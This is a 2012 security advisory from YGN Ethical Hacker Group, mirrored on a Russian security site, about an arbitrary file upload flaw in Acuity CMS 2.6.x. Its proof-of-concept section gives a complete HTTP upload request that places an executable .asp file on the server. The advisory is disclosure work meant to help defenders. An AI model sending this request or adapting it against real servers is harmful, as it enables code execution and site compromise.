Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  b2ePMS 1.0 Authentication Bypass Vulnerability

  Liferay users can assign themselves to organizations, leading to possible privilege escalation

  Liferay 6.1 json webservices are subject to cross-site request forgery attacks

  Liferay 6.1 can be compromised without having an account on the portal

From:YGN Ethical Hacker Group <lists_(at)_yehg.net>
Date:3 июня 2012 г.
Subject:Acuity CMS 2.6.x <= Arbitrary File Upload

1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an
attacker to upload .asp/.aspx files without restrictions, which will
execute ASP(.Net) codes. The issue is due to the script,
/admin/file_manager/file_upload_submit.asp , not properly sanitizing
'file1', 'file2', 'file3', 'fileX' parameters.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="status"

confirmed
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

<% response.write("0wned!") %>

-----------------------------6dc3a236402e2--

[/REQUEST]


6. SOLUTION

The Acunity CMS is no longer in active development.
It is recommended to user another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%
5D_arbitrary_fileupload

#yehg [2012-05-20]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород